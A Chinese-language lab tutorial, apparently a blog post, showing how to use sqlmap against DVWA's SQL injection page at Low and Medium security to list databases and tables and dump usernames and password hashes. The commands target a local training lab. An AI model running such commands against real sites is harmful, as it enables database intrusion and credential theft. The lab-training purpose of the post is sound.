当前位置: 首页 > news >正文

使用sqlmap的SQL Injection注入

DVWA | SQL Injection(Low,Medium)

sqlmap自动化注入(Low):

召唤sqlmap:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3"

拿到探测到注入漏洞:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dbs

 拿到数据库名:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --current-db

拿到当前数据库表:

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --tables -D "dvwa"

拿到表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --columns -D "dvwa" -T "users"

拿到users表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dump -D "dvwa" -T "users" -C "user,password"

拿到用户名和密码:

 sqlmap自动化注入(Mdeium):

探测注入漏洞:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit"

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dbs

 探测当前所在数据库:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --current-db

探测数据库表: 

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --tables -D "dvwa"

 探测user表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --columns -D "dvwa" -T "users"

 提取用户名和密码MD5:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"

http://www.dtcms.com/a/275695.html

相关文章:

  • CSS分层渲染与微前端2.0:解锁前端性能优化的新维度
  • Linux之Zabbix分布式监控篇(一)
  • 电商广告市场惊现“合规黑洞”,企业如何避免亿元罚单
  • phpstudy搭建pikachu靶场
  • 单链表的题目,咕咕咕
  • 区块链平台之以太坊深入解读:技术、经济与生态的全面解析
  • 从OpenMV到执行器:当PID算法开始“调教”舵机
  • 计算机视觉与深度学习 | 基于Matlab的多特征融合可视化指纹识别系统(附完整代码)
  • 迅为RK3588开发板Android13系统super.img的解包和重新组包
  • 【C++】封装红黑树模拟实现set和map
  • GESP2025年6月认证C++三级( 第三部分编程题(2)分糖果)
  • MIG_IP核的时钟系统
  • 《硬件产品经理》第七章:产品开发流程之验证
  • 【6.1.3 漫画分布式锁】
  • 【web站点安全开发】任务1:html基础表单和表格
  • C# 接口(派生成员作为实现)
  • Leaflet面试题及答案(41-60)
  • OneCode 3.0架构深度剖析:工程化模块管理与自治UI系统的设计与实现
  • 20250712-3-Kubernetes 应用程序生命周期管理-服务编排(YAML)及编写技巧_笔记
  • 【Elasticsearch】function_score与rescore
  • 【云端深度学习训练与部署平台】AutoDL连接VSCode运行深度学习项目的全流程
  • Qt窗口:菜单栏
  • 人工智能之数学基础:多元逻辑回归算法的矩阵参数求导
  • 回归(多项式回归)
  • 电商订单数据分析全流程:从数据处理到可视化洞察
  • AI Agents时代,数据分析将彻底被颠覆
  • 数据分析库 Pandas
  • 每日一SQL 【销售分析 III】
  • 【Modern C++ Part10】Prefer-scoped-enum-to-unscoped-enums
  • 开源 python 应用 开发(五)python opencv之目标检测